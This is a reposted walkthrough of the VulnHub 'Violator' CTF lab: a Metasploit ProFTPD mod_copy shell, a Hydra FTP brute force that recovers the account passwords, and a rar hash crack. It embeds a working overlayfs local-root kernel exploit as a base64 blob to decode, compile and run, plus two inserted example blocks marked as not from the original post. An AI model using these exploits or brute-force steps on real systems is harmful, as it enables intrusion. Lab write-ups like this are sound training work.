NO.6 Violator Lab

admin · 2024-11-12 20:19:48


01. Lab Introduction

Description

Welcome to another boot2root / CTF this one is called Violator. The VM is set to grab a DHCP lease on boot. As with my previous VMs, there is a theme, and you will need to snag the flag in order to complete the challenge.

A word of warning: The VM has a small HDD so you can brute force, but please set the disk to non-persistent so you can always revert.

Some hints for you:

  • Vince Clarke can help you with the Fast Fashion.

  • The challenge isn't over with root. The flag is something special.

  • I have put a few trolls in, but only to sport with you.

SHA1SUM: 47F68241E95E189126E94A38CB4AD461DD58EE88 violator.ova

Many thanks to BenR and GKNSB for testing this CTF.

Special thanks and shout-outs go to BenR, Rasta_Mouse and g0tmi1k for helping me to learn a lot creating these challenges.


Download: https://www.vulnhub.com/entry/violator-1,153/

02. Information Gathering

Host discovery

[screenshot]

Port scan

[screenshot]

Directory scan

The directory scan did not turn up anything either.

[screenshot]

Sensitive information

There are three things worth looking at here: a title, a website, and an image.

[screenshot]

The image contains nothing useful.

[screenshot]

The title, on the other hand, is worth a try.

[screenshots]

The vulnerability found this way is still exploitable.

[screenshots]

https://en.wikipedia.org/wiki/Violator_(album) From experience, this is where we will probably need to collect some material to build a wordlist.

[screenshots]

03. Gaining Access

Use the msf proftpd_modcopy_exec module to get a shell:

use exploit/unix/ftp/proftpd_modcopy_exec

[screenshot]

python3 -c 'import pty;pty.spawn("/bin/bash")'

[screenshots]

Besides root, there are four more accounts that can log in.

[screenshot]

Use cewl to crawl the site for a wordlist, then strip the spaces; after clean-up the list looks like this:

cewl -v 'en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt --proxy_host 34.66.5.144 --proxy_port 8888

worldinmyeyes
sweetestperfection
personaljesus
halo
waitingforthenight
enjoythesilence
policyoftruth
bluedress
clean
dangerous
memphisto
sibeling
kaleid
happiestgirl
seaofsin
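The clean-up step above, as an added shell example that is not part of the original post: cewl emits one word per line, so multi-word titles have to be collected first (a constructed sample of four Violator titles stands in for that here). The function then emits each title as squashed lowercase, matching the list above, plus the title as written and the title without spaces, and drops duplicates. The extra shapes are cheap to keep: the john run later on this page reports the rar password as "World in My Eyes", which the squashed form alone would never produce. The output filename and the Hydra invocation in the usage note are assumptions.

```shell
# Added example (not from the original post): turn a list of song titles into
# the password candidates used above. Reads one title per line from stdin and
# emits, per title:
#   squashed lowercase    worldinmyeyes      (the shape the FTP brute force hit)
#   title as written      World in My Eyes
#   title without spaces  WorldinMyEyes
# Duplicates (e.g. a one-word title in its last two shapes) are dropped
# while preserving order.
mangle_titles() {
    while IFS= read -r title; do
        [ -z "$title" ] && continue
        squashed=$(printf '%s' "$title" | tr -d ' ' | tr '[:upper:]' '[:lower:]')
        printf '%s\n' "$squashed"
        printf '%s\n' "$title"
        printf '%s\n' "$(printf '%s' "$title" | tr -d ' ')"
    done | awk '!seen[$0]++'
}

# Constructed sample input standing in for the titles gathered from the page
# (cewl itself splits on whitespace, so multi-word titles must be supplied whole).
sample_titles() {
    printf '%s\n' 'World in My Eyes' 'Policy of Truth' 'Blue Dress' 'Dangerous'
}
```

Usage: `sample_titles | mangle_titles > violator.txt`; the Hydra step can then be run as `hydra -L users.txt -P violator.txt ftp://192.168.43.112`, with users.txt holding the four accounts found above (aw, af, mg, dg).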

Next, brute-force the FTP logins with Hydra.

[screenshot]

[21][ftp] host: 192.168.43.112   login: aw   password: sweetestperfection
[21][ftp] host: 192.168.43.112   login: af   password: enjoythesilence
[21][ftp] host: 192.168.43.112   login: mg   password: bluedress
[21][ftp] host: 192.168.43.112   login: dg   password: policyoftruth

I tried them; all four accounts can log in.

[screenshot]

04. Privilege Escalation

Here we go straight for a kernel exploit; alternatively, the sudo rights of the dg account can be used to escalate.

[screenshot]

There is no wget or curl on the target.

[screenshot]

Base64-encode the exploit source locally, then echo the blob on the target and decode it back into a file:

echo "LyoKanVzdCBhbm90aGVyIG92ZXJsYXlmcyBleHBsb2l0LCB3b3JrcyBvbiBrZXJuZWxzIGJlZm9y
ZSAyMDE1LTEyLTI2CgojIEV4cGxvaXQgVGl0bGU6IG92ZXJsYXlmcyBsb2NhbCByb290CiMgRGF0
ZTogMjAxNi0wMS0wNQojIEV4cGxvaXQgQXV0aG9yOiByZWJlbAojIFZlcnNpb246IFVidW50dSAx
NC4wNCBMVFMsIDE1LjEwIGFuZCBtb3JlCiMgVGVzdGVkIG9uOiBVYnVudHUgMTQuMDQgTFRTLCAx
NS4xMAojIENWRSA6IENWRS0yMDE1LTg2NjAKCmJsYWhAdWJ1bnR1On4kIGlkCnVpZD0xMDAxKGJs
YWgpIGdpZD0xMDAxKGJsYWgpIGdyb3Vwcz0xMDAxKGJsYWgpCmJsYWhAdWJ1bnR1On4kIHVuYW1l
IC1hICYmIGNhdCAvZXRjL2lzc3VlCkxpbnV4IHVidW50dSAzLjE5LjAtNDItZ2VuZXJpYyAjNDh+
MTQuMDQuMS1VYnVudHUgU01QIEZyaSBEZWMgMTggMTA6MjQ6NDkgVVRDIDIwMTUgeDg2XzY0IHg4
Nl82NCB4ODZfNjQgR05VL0xpbnV4ClVidW50dSAxNC4wNC4zIExUUyBcbiBcbApibGFoQHVidW50
dTp+JCAuL292ZXJsYXlmYWlsCnJvb3RAdWJ1bnR1On4jIGlkCnVpZD0wKHJvb3QpIGdpZD0xMDAx
KGJsYWgpIGdyb3Vwcz0wKHJvb3QpLDEwMDEoYmxhaCkKCjEyLzIwMTUKYnkgcmViZWwKCjYzNTRi
NGUyM2RiMjI1YjU2NWQ3OWYyMjZmMmU0OWVjMGZlMWUxOWIKKi8KCiNpbmNsdWRlIDxzdGRpby5o
PgojaW5jbHVkZSA8c2NoZWQuaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgojaW5jbHVkZSA8dW5pc3Rk
Lmg+CiNpbmNsdWRlIDxzY2hlZC5oPgojaW5jbHVkZSA8c3lzL3N0YXQuaD4KI2luY2x1ZGUgPHN5
cy90eXBlcy5oPgojaW5jbHVkZSA8c3lzL21vdW50Lmg+CiNpbmNsdWRlIDxzdGRpby5oPgojaW5j
bHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KI2luY2x1ZGUgPHNjaGVkLmg+CiNp
bmNsdWRlIDxzeXMvc3RhdC5oPgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRlIDxzeXMv
bW91bnQuaD4KI2luY2x1ZGUgPHN5cy90eXBlcy5oPgojaW5jbHVkZSA8c2lnbmFsLmg+CiNpbmNs
dWRlIDxmY250bC5oPgojaW5jbHVkZSA8c3RyaW5nLmg+CiNpbmNsdWRlIDxsaW51eC9zY2hlZC5o
PgojaW5jbHVkZSA8c3lzL3dhaXQuaD4KCnN0YXRpYyBjaGFyIGNoaWxkX3N0YWNrWzEwMjQqMTAy
NF07CgpzdGF0aWMgaW50CmNoaWxkX2V4ZWModm9pZCAqc3R1ZmYpCnsKICAgIHN5c3RlbSgicm0g
LXJmIC90bXAvaGF4aGF4Iik7CiAgICBta2RpcigiL3RtcC9oYXhoYXgiLCAwNzc3KTsKICAgIG1r
ZGlyKCIvdG1wL2hheGhheC93IiwgMDc3Nyk7CiAgICBta2RpcigiL3RtcC9oYXhoYXgvdSIsMDc3
Nyk7CiAgICBta2RpcigiL3RtcC9oYXhoYXgvbyIsMDc3Nyk7CgogICAgaWYgKG1vdW50KCJvdmVy
bGF5IiwgIi90bXAvaGF4aGF4L28iLCAib3ZlcmxheSIsIE1TX01HQ19WQUwsICJsb3dlcmRpcj0v
YmluLHVwcGVyZGlyPS90bXAvaGF4aGF4L3Usd29ya2Rpcj0vdG1wL2hheGhheC93IikgIT0gMCkg
ewoJZnByaW50ZihzdGRlcnIsIm1vdW50IGZhaWxlZC4uXG4iKTsKICAgIH0KCiAgICBjaG1vZCgi
L3RtcC9oYXhoYXgvdy93b3JrIiwwNzc3KTsKICAgIGNoZGlyKCIvdG1wL2hheGhheC9vIik7CiAg
ICBjaG1vZCgiYmFzaCIsMDQ3NTUpOwogICAgY2hkaXIoIi8iKTsKICAgIHVtb3VudCgiL3RtcC9o
YXhoYXgvbyIpOwogICAgcmV0dXJuIDA7Cn0KCmludAptYWluKGludCBhcmdjLCBjaGFyICoqYXJn
dikKewogICAgaW50IHN0YXR1czsKICAgIHBpZF90IHdyYXBwZXIsIGluaXQ7CiAgICBpbnQgY2xv
bmVfZmxhZ3MgPSBDTE9ORV9ORVdOUyB8IFNJR0NITEQ7CiAgICBzdHJ1Y3Qgc3RhdCBzOwoKICAg
IGlmKCh3cmFwcGVyID0gZm9yaygpKSA9PSAwKSB7CiAgICAgICAgaWYodW5zaGFyZShDTE9ORV9O
RVdVU0VSKSAhPSAwKQogICAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgImZhaWxlZCB0byBjcmVh
dGUgbmV3IHVzZXIgbmFtZXNwYWNlXG4iKTsKCiAgICAgICAgaWYoKGluaXQgPSBmb3JrKCkpID09
IDApIHsKICAgICAgICAgICAgcGlkX3QgcGlkID0KICAgICAgICAgICAgICAgIGNsb25lKGNoaWxk
X2V4ZWMsIGNoaWxkX3N0YWNrICsgKDEwMjQqMTAyNCksIGNsb25lX2ZsYWdzLCBOVUxMKTsKICAg
ICAgICAgICAgaWYocGlkIDwgMCkgewogICAgICAgICAgICAgICAgZnByaW50ZihzdGRlcnIsICJm
YWlsZWQgdG8gY3JlYXRlIG5ldyBtb3VudCBuYW1lc3BhY2VcbiIpOwogICAgICAgICAgICAgICAg
ZXhpdCgtMSk7CiAgICAgICAgICAgIH0KCiAgICAgICAgICAgIHdhaXRwaWQocGlkLCAmc3RhdHVz
LCAwKTsKCiAgICAgICAgfQoKICAgICAgICB3YWl0cGlkKGluaXQsICZzdGF0dXMsIDApOwogICAg
ICAgIHJldHVybiAwOwogICAgfQoKICAgIHVzbGVlcCgzMDAwMDApOwoKICAgIHdhaXQoTlVMTCk7
CgogICAgc3RhdCgiL3RtcC9oYXhoYXgvdS9iYXNoIiwmcyk7CgogICAgaWYocy5zdF9tb2RlID09
IDB4ODllZCkKICAgICAgICBleGVjbCgiL3RtcC9oYXhoYXgvdS9iYXNoIiwiYmFzaCIsIi1wIiwi
LWMiLCJybSAtcmYgL3RtcC9oYXhoYXg7cHl0aG9uIC1jIFwiaW1wb3J0IG9zO29zLnNldHJlc3Vp
ZCgwLDAsMCk7b3MuZXhlY2woJy9iaW4vYmFzaCcsJ2Jhc2gnKTtcIiIsTlVMTCk7CgogICAgZnBy
aW50ZihzdGRlcnIsImNvdWxkbid0IGNyZWF0ZSBzdWlkIDooXG4iKTsKICAgIHJldHVybiAtMTsK
fQ==" | base64 -d > ex.c
gcc ex.c -o ex
./ex

Privilege escalation succeeded.
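The transfer above, as an added shell example (not code from the original post) with an integrity check bolted on: the attacker side prints a single-line base64 blob together with the file's SHA-256, and the target side decodes the paste and refuses to keep the file unless the hash matches, so a truncated or mangled paste fails loudly instead of turning into a compiler error or a subtly different binary. Both base64 and sha256sum are coreutils, so they are present on a box that lacks wget and curl; base64 -w0 is a GNU option. The file names and the demo input are assumptions.

```shell
# Added example (not from the original post): base64 paste transfer with a
# SHA-256 check. The exploit source is stood in for by a constructed file.

# Attacker side: emit the blob on one line (GNU base64 -w0), then the hash.
pack_for_paste() {            # usage: pack_for_paste <file>
    base64 -w0 "$1"; echo
    sha256sum "$1" | cut -d' ' -f1
}

# Target side: decode <b64> into <out> and compare against <expected_sha256>.
# Returns 0 on a match; on a decode error or mismatch removes <out> and returns 1.
unpack_and_verify() {         # usage: unpack_and_verify <b64> <expected_sha256> <out>
    printf '%s' "$1" | base64 -d > "$3" 2>/dev/null || { rm -f "$3"; return 1; }
    actual=$(sha256sum "$3" | cut -d' ' -f1)
    if [ "$actual" != "$2" ]; then
        echo "hash mismatch: got $actual, want $2" >&2
        rm -f "$3"
        return 1
    fi
    return 0
}

# Demo: a constructed stand-in for ex.c, a good paste, and a truncated paste.
demo() {
    tmp=$(mktemp -d)
    printf 'int main(void){return 0;}\n' > "$tmp/ex.c"
    blob=$(base64 -w0 "$tmp/ex.c")
    want=$(sha256sum "$tmp/ex.c" | cut -d' ' -f1)
    unpack_and_verify "$blob" "$want" "$tmp/ex_copy.c" && echo "ok: $tmp/ex_copy.c matches"
    unpack_and_verify "${blob%??}" "$want" "$tmp/ex_bad.c" || echo "rejected truncated paste"
    rm -rf "$tmp"
}

demo
```

On the real target the sequence is: run `pack_for_paste ex.c` locally, paste the blob and hash into the shell as the two arguments of `unpack_and_verify`, and only then `gcc ex.c -o ex`.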

[screenshot]

In root's home directory there is a rar file, but its password has to be cracked.

[screenshots]

Next, use rar2john and john to crack it, with the cewl-derived list as the wordlist.

1. Dump the rar file's hash with rar2john
2. Crack the rar file with john
3. Read off the cracked password

┌──(root㉿kali)-[~/下载]
└─# rar2john crocs.rar > password.hashes
! file name: artwork.jpg

┌──(root㉿kali)-[~/下载]
└─# john --wordlist=/root/violator.txt --rules password.hashes
Using default input encoding: UTF-8
Loaded 1 password hash (rar, RAR3 [SHA1 256/256 AVX2 8x AES])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
World in My Eyes (crocs.rar)
1g 0:00:00:02 DONE (2023-04-13 09:45) 0.3968g/s 165.0p/s 165.0c/s 165.0C/s worldinmyeyes..suoregnaD
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The cracked password:

[screenshot]

After extracting the archive we get the image below. A password is hidden in the image by steganography, but I was not able to recover it.

[screenshots]

End


Originally published on the WeChat official account 贝雷帽SEC: NO.6 Violator Lab

Reposted on CN-SEC 中文网 (please keep this link when reposting; thanks to the original author): https://cn-sec.com/archives/1823259.html
